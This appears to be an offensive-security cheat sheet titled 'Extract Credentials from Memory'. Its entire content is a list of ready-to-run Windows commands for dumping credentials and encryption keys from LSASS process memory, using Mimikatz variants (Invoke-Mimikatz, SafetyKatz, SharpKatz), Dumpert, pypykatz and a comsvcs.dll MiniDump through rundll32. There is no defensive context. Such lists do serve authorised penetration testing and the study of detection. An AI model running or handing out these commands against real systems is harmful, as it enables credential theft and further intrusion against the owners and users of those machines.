% Extract Credentials from Memory

# Invoke-Mimikatz
Invoke-Mimikatz -Command "'"sekurlsa::ekeys"'

# Safetykatz
Safetykatz "sekurlsa::ekeys"

# Sharpkatz
SharpKatz.exe --Command ekeys

# Dumpert (Direct System Calls and API Unhooking)
rundll32.exe <Outflank-Dumpert-dll-path>, Dump

# pypykatz (Mimikatz functionality in python)
pypykatz.exe live lsa

# comsvcs.dll
tasklist /FI  "IMAGENAME eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass-process-id> <destination-path> full